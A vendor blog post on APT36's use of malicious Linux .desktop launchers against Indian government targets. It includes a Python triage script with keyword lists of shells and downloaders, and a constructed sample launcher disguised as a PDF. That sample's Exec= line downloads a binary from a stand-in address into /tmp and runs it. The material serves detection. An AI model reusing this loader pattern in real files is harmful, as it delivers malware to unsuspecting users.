22 August 2025

APT36’s Shortcut to Government Systems

Shortcuts as Hidden Weapons

Attackers love abusing shortcuts. Not long ago we wrote about malicious LNK files used against Thai officials and how Contextal was able to proactively stop that threat. Windows users know LNK files well: the seemingly harmless desktop icons that can carry an arbitrary command line and run it the moment they are opened.

Same Trick - Different OS

Now the same playbook shows up on Linux. The threat actor group APT36 has been distributing malicious .desktop files in a campaign targeting Indian government and defense entities. Normally a .desktop file is a simple launcher: its Exec= key names the command the desktop environment runs when the icon is opened, while its Name= and Icon= keys control what the user sees. Here that Exec= line is turned into a loader that pulls in and executes malware. Different platform, same trick: abuse something that looks perfectly legitimate.
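As an added illustration (example code written for this post, not Contextal's own detection logic and not derived from the APT36 samples), the following Python script shows what a first-pass check on a .desktop file can look for. It parses the [Desktop Entry] group with the standard library and flags an Exec= line that wraps a shell with -c, fetches remote content, stages a file in a temp or hidden directory, or chains several commands, plus a document-like Name= or Icon= on something that is really Type=Application. The keyword lists, the verdict threshold and both sample files are constructed for this example; the host in the loader sample is a TEST-NET-2 documentation address.

```python
"""Heuristic triage of Linux .desktop launchers (added example, not vendor code)."""
import configparser
import re
import shlex
from pathlib import PurePosixPath

# Constructed keyword lists and patterns; tune them for your own environment.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"python", "python3", "perl", "ruby", "php"}
URL = re.compile(r"https?://\S+", re.I)
STAGING = re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|\$HOME/\.|~/\.)")
CHAIN = re.compile(r"(&&|\|\||;|\|)")
DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt|ods|txt)\s*$", re.I)
DOC_ICON = re.compile(r"(pdf|office|document|text-x-)", re.I)


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict, or {} if absent or unparseable."""
    # Desktop Entry files are INI-like: '=' is the only delimiter, keys are case-sensitive.
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    cp.optionxform = str
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp.items("Desktop Entry"))


def tokens(cmd):
    """shlex-tokenise a command line, descending into quoted compound arguments
    (the body of `sh -c "..."`) so the binaries inside the wrapper are visible."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return cmd.split()
    out = []
    for tok in argv:
        out.extend(tokens(tok) if " " in tok.strip() else [tok])
    return out


def triage(text):
    """Return {'name', 'exec', 'findings', 'verdict'} for one .desktop file."""
    entry = parse_desktop(text)
    if not entry:
        return {"name": "", "exec": "", "findings": [], "verdict": "not a desktop entry"}
    exec_line = entry.get("Exec", "")
    try:
        top = shlex.split(exec_line)          # top-level argv, before unwrapping sh -c
    except ValueError:
        top = exec_line.split()
    bins = {PurePosixPath(t).name for t in tokens(exec_line)}
    findings = []
    if top and PurePosixPath(top[0]).name in SHELLS and "-c" in top[1:]:
        findings.append("Exec wraps a shell command with -c")
    if bins & DOWNLOADERS or URL.search(exec_line):
        findings.append("Exec fetches remote content")
    if bins & INTERPRETERS:
        findings.append("Exec launches a scripting interpreter")
    if "base64" in bins and {"-d", "--decode"} & bins:
        findings.append("Exec decodes base64 inline")
    if STAGING.search(exec_line):
        findings.append("Exec stages a file in a temp or hidden directory")
    if CHAIN.search(exec_line):
        findings.append("Exec chains several commands")
    name, icon = entry.get("Name", ""), entry.get("Icon", "")
    if entry.get("Type", "").lower() == "application" and (DOC_NAME.search(name) or DOC_ICON.search(icon)):
        findings.append("document-like Name/Icon on an Application launcher")
    # Constructed threshold: three or more independent traits is a strong signal.
    verdict = "likely loader" if len(findings) >= 3 else "review" if findings else "clean"
    return {"name": name, "exec": exec_line, "findings": findings, "verdict": verdict}


# Constructed sample: an ordinary text-editor launcher.
BENIGN = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Comment=Edit text files
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
Categories=GNOME;GTK;Utility;TextEditor;
"""

# Constructed sample shaped like a launcher-turned-loader (198.51.100.7 is TEST-NET-2).
LOADER = """\
[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://198.51.100.7/notes -o /tmp/.cache.bin && chmod +x /tmp/.cache.bin && /tmp/.cache.bin"
"""

if __name__ == "__main__":
    for sample in (BENIGN, LOADER):
        r = triage(sample)
        print(f"{r['name']!r}: {r['verdict']}")
        for f in r["findings"]:
            print("  -", f)
```

The tokeniser deliberately descends one level into the quoted body of a `sh -c` wrapper, because that is where the interesting binaries sit; a check that only looks at the first word of Exec= would see `bash` and nothing else. Treat the result as triage input, not a verdict: a legitimate launcher can chain commands, and a loader can avoid every keyword here, which is exactly why the file's origin and behaviour have to be weighed alongside its content.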

Why This Matters in India

It's worth noting that Linux is widely adopted across India's public sector, with government-endorsed distributions like BOSS and Maya OS already deployed in ministries, defense, and education. That makes this attack a very real threat vector in the region.

Contextal’s Proactive Defense

To protect against such threats, Contextal doesn't just scan extensions or file types in isolation. We analyze the full context: where the file came from, what it contains, what it tries to do, and how it connects to an attack chain. That's how we block threats proactively, before they cause damage.

Deploy Contextal Platform or MailPhence today and stay a step ahead.
